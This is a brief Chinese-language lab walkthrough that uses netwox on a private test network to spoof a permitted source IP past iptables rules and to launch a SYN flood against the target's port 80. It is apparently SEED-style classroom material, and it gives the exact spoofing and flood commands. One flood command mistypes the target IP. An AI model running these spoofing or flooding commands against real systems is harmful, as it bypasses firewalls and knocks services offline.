前言
- 靶机:seedubuntu 12.01,IP:192.168.199.134
- 攻击机:Kali-2020.4,IP:192.168.199.129
- 工具:netwox
IP地址欺骗
靶机开启tcpdump监听
sudo tcpdump -i eth0 tcp port 80 -n -nn
配置防火墙,伪造许可的规则,222是我们伪造的ip
sudo iptables -A INPUT -i eth0 -s 192.168.199.222/32 -j ACCEPT
sudo iptables -A INPUT -i eth0 -p all -j DROP
在Kali上利用netwox进行IP地址欺骗,伪装成192.168.199.222,突破防火墙限制
netwox 52 -E "0:1:2:3:4:5" -I "192.168.199.222" -e "00:0c:29:6f:6a:d5" -i "192.168.199.134"
- -I:伪造的IP
- -e:靶机MAC
- -i:靶机IP
dos攻击
syn flood是建立在IP源地址欺骗之上的攻击
netwox 76 -i 19.168.199.134 -p 80
此时靶机的80端口会接收到大量不同来源的syn包
使用netstat查看连接情况,在防火墙的作用下攻击并未成功
netstat -antu | grep :80
接下来把防火墙关了,攻击成功,此时存在大量的syn半连接
iptables -F
iptables -X
netstat -antu | grep :80